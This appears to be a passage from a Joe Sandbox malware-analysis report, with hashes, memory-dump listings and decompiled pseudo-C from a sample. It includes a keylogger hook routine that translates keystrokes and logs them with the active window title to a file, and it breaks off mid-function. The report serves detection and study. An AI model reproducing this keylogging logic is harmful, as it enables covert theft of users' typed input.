                                      0x002559c3
                                      0x002559cd

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,0025320F,?,?,002555DF,.bss,00000000,?,?,00000000), ref: 002559B8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 25c797ea9806d4b528bd4d13e1f4d93ae01c7a38ee552be68994157771e34b01
                                      • Instruction ID: d57f098279015534646acbad3bb243fe28fb73f4959a394ea95fbd71d76ff9df
                                      • Opcode Fuzzy Hash: 25c797ea9806d4b528bd4d13e1f4d93ae01c7a38ee552be68994157771e34b01
                                      • Instruction Fuzzy Hash: 6BC012223496206BE124215A7C2EF5B895CCBC2F71F01005AFB048A2D0D8D00C4241E4
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 00258C74, Relevance: 1.3, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00258C74(void* __eax, void* __ecx) {
				int _t3;
				void* _t5;

				_t5 =  *(__ecx + 0x10);
				if(_t5 != 0) {
					_t3 = VirtualFree(_t5, 0, 0x8000); // executed
					return _t3;
				} else {
					return __eax;
				}
			}





                                      0x00258c74
                                      0x00258c79
                                      0x00255a35
                                      0x00255a3b
                                      0x00258c7f
                                      0x00258c7f
                                      0x00258c7f

                                      APIs
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeVirtual
                                      • String ID:
                                      • API String ID: 1263568516-0
                                      • Opcode ID: c9404b634c280b3dbf2381a95fe30b48c98943eeb9ef8ab870eb55e0cc6a9b17
                                      • Instruction ID: c66c709d9b901c57841b9c66449b68465d2121d55b41834291398c914ac7eb30
                                      • Opcode Fuzzy Hash: c9404b634c280b3dbf2381a95fe30b48c98943eeb9ef8ab870eb55e0cc6a9b17
                                      • Instruction Fuzzy Hash: A2B09B7035074157DE2CCF205C69F1522107740705F70454CA511D90D15565E4058504
                                      Uniqueness

                                      Uniqueness Score: 0.02%

                                      Function 00255A3C, Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00255A3C(long __ecx) {
				void* _t1;

				_t1 = VirtualAlloc(0, __ecx, 0x3000, 4); // executed
				return _t1;
			}




                                      0x00255a46
                                      0x00255a4c

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,0025347F,?,?,?,0025F311,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 00255A46
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 6a60e09aeaf910d2e88fb1ac26c6d982ad4b5dde57a49450879905dbf5fe6a6f
                                      • Instruction ID: 7e547166ff80f24d8fadf0c5ca9b4f2a70c7ae753d9fa788d9329663f96dc8aa
                                      • Opcode Fuzzy Hash: 6a60e09aeaf910d2e88fb1ac26c6d982ad4b5dde57a49450879905dbf5fe6a6f
                                      • Instruction Fuzzy Hash: 93A022B03C8300FBFC280300AC0FF002A08C300F03F000080F308AC0C000E020808028
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 00255A2D, Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00255A2D(void* __ecx) {
				int _t1;

				_t1 = VirtualFree(__ecx, 0, 0x8000); // executed
				return _t1;
			}




                                      0x00255a35
                                      0x00255a3b

                                      APIs
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeVirtual
                                      • String ID:
                                      • API String ID: 1263568516-0
                                      • Opcode ID: 21f7f2b811b8dc76bef2ae3b9c505f5714ae1b9c1ee0f93bbc697b93033456df
                                      • Instruction ID: 516737b1dc6ca1d1de3c5f0ee6e520429f13461aa5dd5485fe0ee397820626de
                                      • Opcode Fuzzy Hash: 21f7f2b811b8dc76bef2ae3b9c505f5714ae1b9c1ee0f93bbc697b93033456df
                                      • Instruction Fuzzy Hash: ABA00270690B40A6EE7457206D1EF0626146740B41F208644B651A80E449E5A0488A19
                                      Uniqueness

                                      Uniqueness Score: 0.02%

                                      Non-executed Functions

                                      Function 012F85EF, Relevance: 75.5, Strings: 60, Instructions: 527UNIQUE
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: g_2660$g_2660$g_2660$g_2660$g_2660$g_2762$g_2762$g_2762$g_2762$g_2762$g_2863$g_2863$g_2863$g_2863$g_2863$g_3376$g_3376$g_3376$g_3376$g_3376$g_3433$g_3433$g_3433$g_3433$g_3433$g_3435$g_3435$g_3435$g_3435$g_3435$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3553$g_3553$g_3553$g_3553$g_3553
                                      • API String ID: 0-2865011727
                                      • Opcode ID: 8fc9f1ba50400aeab3112237d1631edb29064a8828ebbc40ef117a6b1379b47d
                                      • Instruction ID: 072a5315efd72b6cc95a4aca5a8ae70f09bae975913f9bc3561aadbb3c5cc04a
                                      • Opcode Fuzzy Hash: 8fc9f1ba50400aeab3112237d1631edb29064a8828ebbc40ef117a6b1379b47d
                                      • Instruction Fuzzy Hash: 90E184F7A403017AF32A72296C63F7B36ADC396B4CF984508F524697C7F5A6E5104368
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0025765A, Relevance: 56.3, APIs: 17, Strings: 15, Instructions: 286keyboardUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0025765A(signed int __ecx, int __edx, long _a4) {
				signed int _v8;
				int _v12;
				short _v24;
				short _v56;
				void* _t21;
				short _t24;
				short _t27;
				void* _t36;
				int _t46;
				signed int _t48;
				WCHAR* _t49;
				WCHAR* _t50;
				long _t57;
				void* _t58;
				short _t59;
				short _t60;
				short _t62;
				short _t63;
				short _t64;
				short _t66;
				short _t67;
				short _t69;
				short _t70;
				short _t71;
				short _t73;
				short _t75;
				short _t77;
				short _t78;
				short _t79;
				signed int _t81;

				_t55 = __edx;
				_t48 = __ecx;
				_t46 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t57 = _a4;
				_t21 = __edx - 0x100;
				if(_t21 == 0 || _t21 == 4) {
					_t58 =  *_t57;
					if(_t58 < 0x27) {
						__eflags = _t58 - 0x40;
						if(_t58 <= 0x40) {
							L21:
							__eflags = _t58 - 0x66;
							if(__eflags > 0) {
								__eflags = _t58 - 0xbc;
								if(__eflags > 0) {
									__eflags = _t58 - 0xdb;
									if(__eflags > 0) {
										_t59 = _t58 - 0xdc;
										__eflags = _t59;
										if(_t59 == 0) {
											_t24 = GetAsyncKeyState(0x10);
											_t49 = "|";
											__eflags = _t24;
											if(__eflags == 0) {
												_t49 = "\\";
											}
											L99:
											E00257AEB(_t49, _t55, _t90);
											goto L100;
										}
										_t60 = _t59 - 1;
										__eflags = _t60;
										if(_t60 == 0) {
											_t27 = GetAsyncKeyState(0x10);
											_t50 = "}";
											_t55 = "]";
											L76:
											__eflags = _t27;
											_t49 =  ==  ? _t55 : _t50;
											goto L99;
										}
										__eflags = _t60 - 1;
										if(__eflags == 0) {
											_t27 = GetAsyncKeyState(0x10);
											_t50 = "\"";
											_t55 = "\'";
											goto L76;
										}
										L94:
										GetKeyNameTextW((( *(_t57 + 8) << 8) +  *((intOrPtr*)(_t57 + 4)) << 0x10) + 1,  &_v56, 0xf);
										_t49 =  &_v56;
										goto L99;
									}
									if(__eflags == 0) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = "{";
										_t55 = "[";
										goto L76;
									}
									_t62 = _t58 - 0xbd;
									__eflags = _t62;
									if(_t62 == 0) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = "_";
										_t55 = "-";
										goto L76;
									}
									_t63 = _t62 - 1;
									__eflags = _t63;
									if(_t63 == 0) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = ">";
										_t55 = ".";
										goto L76;
									}
									_t64 = _t63 - 1;
									__eflags = _t64;
									if(_t64 == 0) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = "?";
										_t55 = "/";
										goto L76;
									}
									__eflags = _t64 - 1;
									if(__eflags != 0) {
										goto L94;
									}
									_t27 = GetAsyncKeyState(0x10);
									_t50 = "~";
									_t55 = "`";
									goto L76;
								}
								if(__eflags == 0) {
									_t27 = GetAsyncKeyState(0x10);
									_t50 = "<";
									_t55 = ",";
									goto L76;
								}
								__eflags = _t58 - 0xa3;
								if(_t58 > 0xa3) {
									__eflags = _t58 - 0xa5;
									if(__eflags <= 0) {
										L78:
										_t49 = L"[ALT]";
										goto L99;
									}
									__eflags = _t58 - 0xba;
									if(_t58 == 0xba) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = ":";
										_t55 = ";";
										goto L76;
									}
									__eflags = _t58 - 0xbb;
									if(__eflags != 0) {
										goto L94;
									}
									_t27 = GetAsyncKeyState(0x10);
									_t50 = "+";
									_t55 = "=";
									goto L76;
								}
								__eflags = _t58 - 0xa2;
								if(__eflags >= 0) {
									L71:
									_t49 = L"[CTRL]";
									goto L99;
								}
								__eflags = _t58 - 0x67;
								if(__eflags == 0) {
									_t49 = "7";
									goto L99;
								}
								__eflags = _t58 - 0x68;
								if(__eflags == 0) {
									_t49 = "8";
									goto L99;
								}
								__eflags = _t58 - 0x69;
								if(__eflags == 0) {
									_t49 = "9";
									goto L99;
								}
								__eflags = _t58 - 0xa0 - 1;
								if(__eflags > 0) {
									goto L94;
								}
								goto L100;
							}
							if(__eflags == 0) {
								_t49 = "6";
								goto L99;
							}
							__eflags = _t58 - 0x20;
							if(__eflags > 0) {
								__eflags = _t58 - 0x62;
								if(__eflags > 0) {
									_t66 = _t58 - 0x63;
									__eflags = _t66;
									if(__eflags == 0) {
										_t49 = "3";
										goto L99;
									}
									_t67 = _t66 - 1;
									__eflags = _t67;
									if(__eflags == 0) {
										_t49 = "4";
										goto L99;
									}
									__eflags = _t67 - 1;
									if(__eflags != 0) {
										goto L94;
									}
									_t49 = "5";
									goto L99;
								}
								if(__eflags == 0) {
									_t49 = "2";
									goto L99;
								}
								_t69 = _t58 - 0x2d;
								__eflags = _t69;
								if(__eflags == 0) {
									_t49 = L"[INSERT]";
									goto L99;
								}
								_t70 = _t69 - 1;
								__eflags = _t70;
								if(__eflags == 0) {
									_t49 = L"[DEL]";
									goto L99;
								}
								_t71 = _t70 - 0x32;
								__eflags = _t71;
								if(__eflags == 0) {
									_t49 = "0";
									goto L99;
								}
								__eflags = _t71 - 1;
								if(__eflags != 0) {
									goto L94;
								}
								_t49 = "1";
								goto L99;
							}
							if(__eflags == 0) {
								_t49 = " ";
								goto L99;
							}
							__eflags = _t58 - 0x11;
							if(__eflags > 0) {
								_t73 = _t58 - 0x12;
								__eflags = _t73;
								if(__eflags == 0) {
									goto L78;
								}
								_t75 = _t73;
								__eflags = _t75;
								if(__eflags == 0) {
									_t49 = L"[CAPS]";
									goto L99;
								}
								__eflags = _t75 - 7;
								if(__eflags != 0) {
									goto L94;
								}
								_t49 = L"[ESC]";
								goto L99;
							}
							if(__eflags == 0) {
								goto L71;
							}
							_t77 = _t58 - 8;
							__eflags = _t77;
							if(__eflags == 0) {
								_t49 = L"[BKSP]";
								goto L99;
							}
							_t78 = _t77 - 1;
							__eflags = _t78;
							if(__eflags == 0) {
								_t49 = L"[TAB]";
								goto L99;
							}
							_t79 = _t78 - 4;
							__eflags = _t79;
							if(__eflags == 0) {
								_t49 = L"[ENTER]\r\n";
								goto L99;
							}
							__eflags = _t79 - 3;
							if(__eflags == 0) {
								goto L100;
							}
							goto L94;
						}
						L19:
						__eflags = _t58 - 0x5b;
						if(_t58 >= 0x5b) {
							goto L21;
						}
						_t36 = E00257AE0();
						__eflags = GetAsyncKeyState(0x10);
						__eflags = E00257ACE(_t48 & 0xffffff00 | GetAsyncKeyState(0x10) != 0x00000000, _t36);
						_t53 =  !=  ? _t58 : _t58 + 0x20;
						wsprintfW( &_v24, L"%c",  !=  ? _t58 : _t58 + 0x20);
						E00257AEB( &_v24, _t36, __eflags);
						_t46 = _v8;
						goto L100;
					}
					if(_t58 > 0x40) {
						goto L19;
					}
					if(GetAsyncKeyState(0x10) == 0) {
						wsprintfW( &_v24, L"%c", _t58);
						_t49 =  &_v24;
						goto L99;
					}
					_t81 = _t58 + 0xffffffd0;
					_t90 = _t81 - 9;
					if(_t81 > 9) {
						goto L100;
					}
					switch( *((intOrPtr*)(_t81 * 4 +  &M00257AA6))) {
						case 0:
							_t49 = ")";
							goto L99;
						case 1:
							__ecx = "!";
							goto L99;
						case 2:
							__ecx = "@";
							goto L99;
						case 3:
							__ecx = "#";
							goto L99;
						case 4:
							__ecx = "$";
							goto L99;
						case 5:
							__ecx = "%";
							goto L99;
						case 6:
							__ecx = "^";
							goto L99;
						case 7:
							__ecx = "&";
							goto L99;
						case 8:
							__ecx = "*";
							goto L99;
						case 9:
							__ecx = "(";
							goto L99;
					}
				} else {
					L100:
					return CallNextHookEx(0, _t46, _v12, _t57);
				}
			}

































                                      0x0025765a
                                      0x0025765a
                                      0x00257663
                                      0x00257666
                                      0x00257669
                                      0x0025766d
                                      0x00257670
                                      0x00257675
                                      0x00257680
                                      0x00257685
                                      0x00257733
                                      0x00257736
                                      0x00257784
                                      0x00257784
                                      0x00257787
                                      0x002578a7
                                      0x002578a9
                                      0x00257980
                                      0x00257982
                                      0x00257a15
                                      0x00257a15
                                      0x00257a1b
                                      0x00257a76
                                      0x00257a7c
                                      0x00257a81
                                      0x00257a84
                                      0x00257a86
                                      0x00257a86
                                      0x00257a8b
                                      0x00257a8b
                                      0x00000000
                                      0x00257a8b
                                      0x00257a1d
                                      0x00257a1d
                                      0x00257a20
                                      0x00257a5f
                                      0x00257a65
                                      0x00257a6a
                                      0x0025793e
                                      0x0025793e
                                      0x00257941
                                      0x00000000
                                      0x00257941
                                      0x00257a22
                                      0x00257a25
                                      0x00257a48
                                      0x00257a4e
                                      0x00257a53
                                      0x00000000
                                      0x00257a53
                                      0x00257a27
                                      0x00257a3b
                                      0x00257a41
                                      0x00000000
                                      0x00257a41
                                      0x00257988
                                      0x00257a00
                                      0x00257a06
                                      0x00257a0b
                                      0x00000000
                                      0x00257a0b
                                      0x0025798a
                                      0x0025798a
                                      0x00257990
                                      0x002579e9
                                      0x002579ef
                                      0x002579f4
                                      0x00000000
                                      0x002579f4
                                      0x00257992
                                      0x00257992
                                      0x00257995
                                      0x002579d2
                                      0x002579d8
                                      0x002579dd
                                      0x00000000
                                      0x002579dd
                                      0x00257997
                                      0x00257997
                                      0x0025799a
                                      0x002579bb
                                      0x002579c1
                                      0x002579c6
                                      0x00000000
                                      0x002579c6
                                      0x0025799c
                                      0x0025799f
                                      0x00000000
                                      0x00000000
                                      0x002579a7
                                      0x002579ad
                                      0x002579b2
                                      0x00000000
                                      0x002579b2
                                      0x002578af
                                      0x00257969
                                      0x0025796f
                                      0x00257974
                                      0x00000000
                                      0x00257974
                                      0x002578b5
                                      0x002578bb
                                      0x00257910
                                      0x00257916
                                      0x0025795d
                                      0x0025795d
                                      0x00000000
                                      0x0025795d
                                      0x00257918
                                      0x0025791e
                                      0x0025794b
                                      0x00257951
                                      0x00257956
                                      0x00000000
                                      0x00257956
                                      0x00257920
                                      0x00257926
                                      0x00000000
                                      0x00000000
                                      0x0025792e
                                      0x00257934
                                      0x00257939
                                      0x00000000
                                      0x00257939
                                      0x002578bd
                                      0x002578c3
                                      0x00257906
                                      0x00257906
                                      0x00000000
                                      0x00257906
                                      0x002578c5
                                      0x002578c8
                                      0x002578fc
                                      0x00000000
                                      0x002578fc
                                      0x002578ca
                                      0x002578cd
                                      0x002578f2
                                      0x00000000
                                      0x002578f2
                                      0x002578cf
                                      0x002578d2
                                      0x002578e8
                                      0x00000000
                                      0x002578e8
                                      0x002578da
                                      0x002578dd
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x002578e3
                                      0x0025778d
                                      0x00257898
                                      0x00000000
                                      0x00257898
                                      0x00257793
                                      0x00257796
                                      0x00257816
                                      0x00257819
                                      0x00257867
                                      0x00257867
                                      0x0025786a
                                      0x0025788e
                                      0x00000000
                                      0x0025788e
                                      0x0025786c
                                      0x0025786c
                                      0x0025786f
                                      0x00257884
                                      0x00000000
                                      0x00257884
                                      0x00257871
                                      0x00257874
                                      0x00000000
                                      0x00000000
                                      0x0025787a
                                      0x00000000
                                      0x0025787a
                                      0x0025781b
                                      0x0025785d
                                      0x00000000
                                      0x0025785d
                                      0x0025781d
                                      0x0025781d
                                      0x00257820
                                      0x00257853
                                      0x00000000
                                      0x00257853
                                      0x00257822
                                      0x00257822
                                      0x00257825
                                      0x00257849
                                      0x00000000
                                      0x00257849
                                      0x00257827
                                      0x00257827
                                      0x0025782a
                                      0x0025783f
                                      0x00000000
                                      0x0025783f
                                      0x0025782c
                                      0x0025782f
                                      0x00000000
                                      0x00000000
                                      0x00257835
                                      0x00000000
                                      0x00257835
                                      0x00257798
                                      0x0025780c
                                      0x00000000
                                      0x0025780c
                                      0x0025779a
                                      0x0025779d
                                      0x002577e0
                                      0x002577e0
                                      0x002577e3
                                      0x00000000
                                      0x00000000
                                      0x002577ea
                                      0x002577ea
                                      0x002577ed
                                      0x00257802
                                      0x00000000
                                      0x00257802
                                      0x002577ef
                                      0x002577f2
                                      0x00000000
                                      0x00000000
                                      0x002577f8
                                      0x00000000
                                      0x002577f8
                                      0x0025779f
                                      0x00000000
                                      0x00000000
                                      0x002577a5
                                      0x002577a5
                                      0x002577a8
                                      0x002577d6
                                      0x00000000
                                      0x002577d6
                                      0x002577aa
                                      0x002577aa
                                      0x002577ad
                                      0x002577cc
                                      0x00000000
                                      0x002577cc
                                      0x002577af
                                      0x002577af
                                      0x002577b2
                                      0x002577c2
                                      0x00000000
                                      0x002577c2
                                      0x002577b4
                                      0x002577b7
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x002577bd
                                      0x00257738
                                      0x00257738
                                      0x0025773b
                                      0x00000000
                                      0x00000000
                                      0x0025773d
                                      0x0025774c
                                      0x00257759
                                      0x00257761
                                      0x0025776b
                                      0x00257777
                                      0x0025777c
                                      0x00000000
                                      0x0025777c
                                      0x0025768e
                                      0x00000000
                                      0x00000000
                                      0x0025769f
                                      0x00257722
                                      0x0025772b
                                      0x00000000
                                      0x0025772b
                                      0x002576a1
                                      0x002576a4
                                      0x002576a7
                                      0x00000000
                                      0x00000000
                                      0x002576ad
                                      0x00000000
                                      0x002576b4
                                      0x00000000
                                      0x00000000
                                      0x002576be
                                      0x00000000
                                      0x00000000
                                      0x002576c8
                                      0x00000000
                                      0x00000000
                                      0x002576d2
                                      0x00000000
                                      0x00000000
                                      0x002576dc
                                      0x00000000
                                      0x00000000
                                      0x002576e6
                                      0x00000000
                                      0x00000000
                                      0x002576f0
                                      0x00000000
                                      0x00000000
                                      0x002576fa
                                      0x00000000
                                      0x00000000
                                      0x00257704
                                      0x00000000
                                      0x00000000
                                      0x0025770e
                                      0x00000000
                                      0x00000000
                                      0x00257a90
                                      0x00257a90
                                      0x00257aa1
                                      0x00257aa1

                                      APIs
                                      • GetAsyncKeyState.USER32(00000010), ref: 00257696
                                      • CallNextHookEx.USER32(00000000,?,?,?), ref: 00257A97
                                        • Part of subcall function 00257AEB: GetForegroundWindow.USER32 ref: 00257B14
                                        • Part of subcall function 00257AEB: GetWindowTextW.USER32(00000000,?,00000104), ref: 00257B27
                                        • Part of subcall function 00257AEB: lstrlenW.KERNEL32(-00000210,{Unknown},?,?), ref: 00257B90
                                        • Part of subcall function 00257AEB: CreateFileW.KERNEL32(?,00000004,00000001,00000000,00000004,00000080,00000000), ref: 00257BFE
                                        • Part of subcall function 00257AEB: lstrlenW.KERNEL32(002629A0,00000008,00000000,?,?), ref: 00257C27
                                        • Part of subcall function 00257AEB: WriteFile.KERNEL32(?,002629A0,00000000,?,?), ref: 00257C33
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileWindowlstrlen$AsyncCallCreateForegroundHookNextStateTextWrite
                                      • String ID: D&&$[ALT]$[BKSP]$[CAPS]$[CTRL]$[DEL]$[ENTER]$[ESC]$[INSERT]$[TAB]$|*&$*&$*&$*&$*&
                                      • API String ID: 2452648998-2404510253
                                      • Opcode ID: 7e59b415d706b2f4cd2295f4956b71f0c4c74eae53b4cdf9fc10f6b9e3570e52
                                      • Instruction ID: 90192df7ebc470501d8a6cbf3057084105176d0854f714fd35e7e9f42c59e8eb
                                      • Opcode Fuzzy Hash: 7e59b415d706b2f4cd2295f4956b71f0c4c74eae53b4cdf9fc10f6b9e3570e52
                                      • Instruction Fuzzy Hash: A291EF32AFC912D7D7280AA8756C67D7516A780353F208136DE43676D0C9F04EBEA3DA
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 012FD860, Relevance: 51.9, Strings: 40, Instructions: 1906UNIQUE
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 2o>H$2o>H$2o>H$2o>H$2o>H$B|_5$B|_5$B|_5$B|_5$B|_5$B|_5$Ku~$Ku~$Ku~$Ku~$Ku~$Ku~$Y$_6+*$ffUb$ffUb$i}J$i}J$i}J$qjf$qjf$qjf$qzv$vyvl$vyvl$vyvl$vyvl$wA,$wA,$wA,$x)1$x)1$x)1$x)1$x)1
                                      • API String ID: 0-3393124289
                                      • Opcode ID: d942da2efe8932096f60084ecff29c836ae3a1650202d28c10e4504cf7558ce6
                                      • Instruction ID: 84f5e911dd0e6ee595baa0c866e15f76bef1c4170aaeea2d85e088c8a4b2bd37
                                      • Opcode Fuzzy Hash: d942da2efe8932096f60084ecff29c836ae3a1650202d28c10e4504cf7558ce6
                                      • Instruction Fuzzy Hash: 1753EFB48057A98BEB34CF59C9987DDBBB1BB41328F1083D9D1682B291C7B61AC5CF41
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 00257CB3, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 277registrystringwindowUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 85%
                                      			E00257CB3(void* __ecx, void* __eflags, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				char _v524;
				short _v564;
				intOrPtr _v568;
				short _v570;
				short _v572;
				long _v596;
				char _v600;
				int _v604;
				char _v612;
				intOrPtr _v616;
				struct _OVERLAPPED* _v620;
				char _v624;
				char _v628;
				void* _v632;
				char _v636;
				intOrPtr _v640;
				struct _OVERLAPPED* _v644;
				char _v648;
				void* _t76;
				short _t77;
				void* _t82;
				char* _t84;
				struct _OVERLAPPED** _t86;
				long _t88;
				intOrPtr _t93;
				intOrPtr* _t96;
				long _t100;
				intOrPtr _t101;
				WCHAR* _t102;
				intOrPtr _t104;
				void* _t105;
				long _t109;
				void* _t110;
				intOrPtr _t111;
				intOrPtr _t113;
				long _t116;
				intOrPtr _t117;
				intOrPtr _t119;
				long _t121;
				intOrPtr _t122;
				intOrPtr _t124;
				void* _t126;
				intOrPtr _t128;
				intOrPtr _t130;
				long _t132;
				intOrPtr _t133;
				intOrPtr _t135;
				DWORD* _t136;
				long _t137;
